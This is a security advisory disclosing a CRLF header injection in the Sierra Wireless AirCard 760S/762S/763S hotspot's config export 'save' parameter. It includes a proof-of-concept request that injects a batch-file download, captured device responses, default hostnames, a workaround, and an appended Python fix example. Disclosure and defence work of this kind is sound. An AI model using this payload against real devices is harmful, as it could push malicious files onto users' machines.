`Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
[*] Overview
Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.
The AirCard 760S/762S/763S Web-based Administrative Console suffers from an
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.
[*] Description
The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered before it is written into the Content-Disposition response header.
http://<routerURL>/export.cfg?save=export.cfg
[*] Traffic sample from POC
(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)
> GET /export.cfg?save=export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a&sessionId=00000001%2DhYL4H4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> User-Agent: curl/7.40.0
> Host: router.4g
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: httpd/2.7 (sierra; D4C)
< Date: Mon, 12 Jan 2015 05:32:38 GMT
< Connection: keep-alive
< Cache-Control: no-cache
< Content-Disposition: attachment; filename=export.bat
< Content-type: application/bat

pause
Content-type: application/octet-stream
Transfer-encoding: chunked
3a
#
# Configuration export from Telstra WI-FI 4G
#
# Model:
[*] Limitations
While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.
However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:
* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g
[*] Workaround
Change the name and IP address of the device to something other than the
default settings.
[*] Vendor Contact
An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.
regards,
Luke
`
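A server-side fix for the unfiltered "save" parameter described in the advisory, shown next to the unfiltered behaviour. This is an added example, not code from the advisory or from the device firmware; the function names, the allow-list pattern, the default name and the device.example URLs are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for an exported file name (assumed policy): no control
# characters, path separators, quotes or header delimiters can match.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
DEFAULT_NAME = "export.cfg"


def save_param(url):
    """Return the percent-decoded 'save' query parameter, or None."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("save")
    return values[0] if values else None


def naive_header(name):
    """Unfiltered behaviour described in the advisory (hypothetical code)."""
    return "Content-Disposition: attachment; filename=" + name


def hardened_header(name):
    """Emit the header only for allow-listed names, else use the default."""
    if name is None or not SAFE_NAME.fullmatch(name):
        name = DEFAULT_NAME
    return 'Content-Disposition: attachment; filename="' + name + '"'


def header_line_count(header):
    """Number of lines a client would parse out of one emitted header."""
    return len(header.split("\r\n"))


# Constructed sample requests (not captured traffic).
BENIGN = "http://device.example/export.cfg?save=backup-2015.cfg"
INJECTED = "http://device.example/export.cfg?save=a.cfg%0d%0aX-Added:%20yes"

if __name__ == "__main__":
    for url in (BENIGN, INJECTED):
        name = save_param(url)
        print(repr(name))
        print("  naive   :", header_line_count(naive_header(name)), "line(s)")
        print("  hardened:", header_line_count(hardened_header(name)), "line(s)")
```

Validating after percent-decoding matters here: the CR/LF pair only appears once `%0d%0a` has been decoded, so a filter applied to the raw query string would miss it.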